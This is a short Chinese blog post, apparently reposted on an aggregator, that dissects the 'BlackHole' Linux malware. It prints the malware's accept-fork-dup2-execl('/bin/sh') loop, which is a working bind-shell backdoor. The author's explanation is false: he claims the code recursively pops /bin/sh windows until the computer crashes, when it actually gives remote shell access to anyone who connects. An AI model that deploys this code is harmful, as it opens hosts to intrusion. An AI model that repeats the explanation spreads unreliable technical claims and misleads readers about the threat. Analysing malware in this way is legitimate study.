zoukankan      html  css  js  c++  java
  • 基于Linux平台病毒BlackHole病毒的决心

    今天会见了病毒,少量的代码,但在使用小漏洞的函数的,真正的杀伤力相当惊人。

    转载请注明出处:http://blog.csdn.net/u010484477谢谢^_^

    这个病毒前面就是常规的:

    socket->bind->listen这个过程大家都大笑

    以下我想具体说一下它的攻击方式:

    while ( 1 )
      {
        nsock = accept(sock, (struct sockaddr *)&v10, (socklen_t *)&v9);// wait to link
        if ( nsock < 0 )
          break;
        if ( fork() )                               // if Create progress is father progress
        {
          send(nsock, " Connected! ", strlen(" Connected! ") - 1, 0);
          send(nsock, "This fine tool coded by Bronc Buster ", strlen("This fine tool coded by Bronc Buster ") - 1, 0);//这是他在自己娱乐呢
          send(
            nsock,
            "Please enter each command followed by ';' ",
            strlen("Please enter each command followed by ';' ") - 1,
            0);
          dup2(nsock, 0);
          dup2(nsock, 1);
          dup2(nsock, 2);
          execl("/bin/sh", "/bin/sh", 0);**************这句话就是真正的攻击了,先找找execl看看他咋攻击的呢吐舌头
          close(nsock);
          exit(0);
        }
        close(nsock);
      }

    在execl中第一个參数是path即指向要运行的文件路径第二个參数是运行该文件的參数列表

    在上面的代码中首先系统找到/bin/sh这一路径,然后是第二个參数运行/bin/sh。弹出一个窗体。而接下来/bin/sh又作为路径。继续寻找对应的參数列表,也就是/bin/sh。然后再运行。再弹窗。再查找,运行,弹窗,查找,运行,弹窗,查找。。。

    惊恐一直下去,直到。。

    直到电脑over

    这个病毒写的杀伤力还是挺大的。(⊙o⊙)学无止境啊

    最后是一句话送给大家:

    非常多事情就像旅行一样,但你决定要出发的时候,最困难的部分已经完成!

    版权声明:本文博客原创文章,博客,未经同意,不得转载。

  • 相关阅读:
    iOS uitableView响应事件被拦截
    《数据结构、算法与应用》8.(顺序查找数组中第一个出现指定元素的位置)
    Codeforces 475B Strongly Connected City 强连通裸题
    hdu1501&amp;&amp;poj2192 Zipper(DFS)
    hdu 4031 Attack(树状数组区间更新单点求值&amp;暴力)
    Bash Shell 流程控制 —— select
    Longest Valid Parentheses
    HDU 2955 Robberies
    浅谈 Objective-C Associated Objects
    浅谈 Objective-C Associated Objects
  • 原文地址:https://www.cnblogs.com/zfyouxi/p/4729689.html
Copyright © 2011-2022 走看看